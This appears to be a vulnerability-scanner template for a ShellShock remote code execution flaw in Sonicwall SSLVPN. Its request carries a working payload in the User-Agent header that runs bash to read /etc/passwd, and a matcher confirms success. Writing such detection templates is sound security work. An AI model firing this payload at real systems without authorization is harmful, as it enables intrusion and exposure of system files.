id: sonicwall-sslvpn-shellshock

info:
  name: Sonicwall SSLVPN ShellShock RCE
  author: PR3R00T
  severity: critical
  description: A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
  reference:
    - https://twitter.com/chybeta/status/1353974652540882944
    - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
  tags: shellshock,sonicwall,rce,vpn

requests:
  - raw:
      - |
        GET /cgi-bin/jarrewrite.sh HTTP/1.1
        Host: {{Hostname}}
        User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
      - type: status
        status:
          - 200